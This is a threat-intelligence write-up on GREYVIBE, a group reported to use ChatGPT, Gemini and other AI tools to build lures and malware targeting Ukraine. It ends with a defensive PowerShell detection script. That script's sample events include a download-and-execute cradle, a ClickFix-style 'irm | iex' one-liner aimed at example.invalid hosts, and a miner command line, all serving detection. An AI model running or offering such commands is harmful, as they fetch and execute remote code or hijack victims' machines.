GREYVIBE — AI-Powered Cyberattacks Targeting Ukraine With Custom Tooling
GREYVIBE is a Russian-speaking threat actor using AI-generated lures, custom malware, and multi-vector campaigns to target Ukrainian military, government, and civilian entities since August 2025.
Summary
WithSecure has documented GREYVIBE, a Russian-speaking threat actor active since at least August 2025, targeting Ukrainian and Ukraine-related organizations with AI-assisted cyberattack campaigns. The group operates in the grey area between state-aligned espionage and cybercrime, using generative AI to supercharge its operations.
GREYVIBE employs five distinct attack chains. PhantomMail uses spear-phishing emails with malicious ZIP/RAR archives hosted on Google Drive and 4sync, deploying JavaScript-based loaders that deliver the PhantomRelay PowerShell RAT. PhantomClick uses ClickFix-style fake CAPTCHA pages on spoofed Zoom and LAPAS domains to trick users into pasting and running commands that infect their own machines. PrincessClub operates fake Ukrainian adult/dating websites to deliver FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware, including WebRTC-based live calls that capture victim audio/video. DroneLink uses fake Ukrainian military charity websites themed around FPV drones to deliver WireGuard VPN tunneling and LegionRelay. Nebo deploys a FallSpy variant disguised as a Russian military communication terminal login page.
The group relies heavily on generative AI. Images and lure content are produced using Ideogram AI, OpenAI ChatGPT, and Google Gemini. Custom obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP) and the LegionRelay RAT were likely developed with LLM assistance. The PowerShell-based LegionRelay supports file theft, screenshot capture, browser credential theft, Telegram/WhatsApp exfiltration, and RDP access setup. PhantomRelay provides system fingerprinting, dynamic script loading, and command execution.
Figure: AI-generated phishing pages and decoy documents (WithSecure)
GREYVIBE shares infrastructure and personnel ties with the Russian cybercrime ecosystem. Indicators include a unique ISO builder linked to former TrickBot members (UAC-0098), PhantomRelay variants appearing in unrelated cybercrime campaigns, XMRig miner deployment on victim machines, and operational security blunders like uploading test samples to VirusTotal. WithSecure assesses with moderate confidence that the group includes current or former cybercriminal members operating under state direction or as a hybrid team.
Why It Matters
GREYVIBE represents a new model of threat actor: a hybrid group that combines state-aligned targeting priorities with cybercrime-sourced tooling and AI-generated operational capability. The use of AI to create lures, develop malware, and generate obfuscation scripts lowers the barrier to sophisticated targeting. The group’s rapid iteration — five distinct attack chains with varying lures and delivery mechanisms — shows how AI delivers an operational tempo that would otherwise require much larger teams. For defenders, this means traditional attribution methods based on stable technical artifacts become less reliable, because AI-assisted groups can refactor components faster than clustering algorithms can track them.
Defender Takeaways
- Deploy detection rules for PhantomRelay PowerShell RAT patterns: system fingerprinting, dynamic script loading, and encoded PowerShell commands.
- Monitor for ClickFix-style CAPTCHA pages on suspicious domains — this is a growing delivery mechanism used by multiple threat actors.
- Review supplier risk for fake charity and adult website infrastructure that could serve as delivery vectors.
- Include GREYVIBE IOCs (provided by WithSecure on GitHub) in threat intel feeds.
- Watch ANY.RUN/VirusTotal submissions: an actor's own test uploads are operational security failures that can reveal new tools and techniques before they reach victims.
- Monitor for XMRig miner alongside espionage tooling — crypto-miner co-deployment is a GREYVIBE signature.
- Watch for AI-generated phishing content: lures with inconsistent metadata or subtly unnatural image artifacts.
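As an added illustration of the first, second and sixth takeaways (not code from WithSecure, BleepingComputer or the GREYVIBE report), the following Python script scores process-creation command lines for the PowerShell behaviours named above: encoded commands (decoded from UTF-16LE base64 and re-scanned), dynamic script loading via download cradles and Invoke-Expression, system fingerprinting, and miner command-line artifacts alongside them. The log lines, the `example.invalid` URLs, the weights and the threshold are all constructed here for the example; no real GREYVIBE indicators are used.

```python
"""Score PowerShell / process command lines for RAT-style behaviours.

Added example: the patterns and weights below are illustrative assumptions,
not signatures published by WithSecure. Feed it Sysmon Event ID 1 or
Windows 4688 command lines in production.
"""
import base64
import re

# --- constructed sample events (not real IoCs) -------------------------------
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
# PowerShell -EncodedCommand expects base64 of the UTF-16LE script text.
_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",            # benign admin job
    f"powershell.exe -nop -w hidden -enc {_ENC}",                         # encoded download cradle
    'powershell -w h -c "irm http://example.invalid/verify | iex"',       # ClickFix-style pasted one-liner
    'powershell.exe -c "Get-CimInstance Win32_OperatingSystem | Select Caption"',  # fingerprinting only
    r"C:\Users\Public\upd.exe -o pool.example.invalid:3333 -u WALLET_PLACEHOLDER --donate-level 0",  # miner
]

# --- detection patterns (assumed, case-insensitive) --------------------------
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CHECKS = [
    ("dynamic_execution", re.compile(r"(?i)(invoke-expression|\biex\b)")),
    ("download_cradle", re.compile(
        r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient)")),
    ("system_fingerprinting", re.compile(
        r"(?i)(get-wmiobject|get-ciminstance|win32_computersystem|win32_operatingsystem|systeminfo|whoami)")),
    ("crypto_miner", re.compile(r"(?i)(xmrig|--donate-level|stratum\+tcp://|-o\s+pool\.)")),
]
WEIGHTS = {
    "encoded_command": 2,
    "dynamic_execution": 2,
    "download_cradle": 2,
    "system_fingerprinting": 1,
    "crypto_miner": 3,
}
ALERT_THRESHOLD = 3  # assumed: a lone encoded command or lone WMI query is not enough on its own


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Score one command line; the decoded payload is scanned together with the raw line."""
    findings = []
    if ENCODED_FLAG.search(cmdline):
        findings.append("encoded_command")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    for name, pattern in CHECKS:
        if pattern.search(text):
            findings.append(name)
    score = sum(WEIGHTS[f] for f in findings)
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings,
            "score": score, "flagged": score >= ALERT_THRESHOLD}


def scan(events):
    """Return only the events that cross the alert threshold."""
    return [r for r in (analyze(e) for e in events) if r["flagged"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[score {hit['score']}] {hit['findings']} :: {hit['cmdline'][:70]}")
        if hit["decoded"]:
            print(f"    decoded -> {hit['decoded']}")
```

Scanning the decoded payload rather than only the raw line is what makes the encoded case useful: the `-enc` flag alone says little, but once the UTF-16LE text is recovered the same cradle regexes apply. Tune the weights and threshold against your own baseline of legitimate encoded PowerShell (management agents use it routinely) before alerting on them.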
Source
Title: GreyVibe Hackers Use ChatGPT, Gemini to Power Cyberattacks — BleepingComputer
URL: https://www.bleepingcomputer.com/news/security/greyvibe-hackers-use-chatgpt-gemini-to-power-cyberattacks/
Related
- Social Engineering — detection and response for T1566 techniques
- Command and Control — detection and response for T1071 techniques
- Malware Analysis Fundamentals — detection and response for T1204 techniques
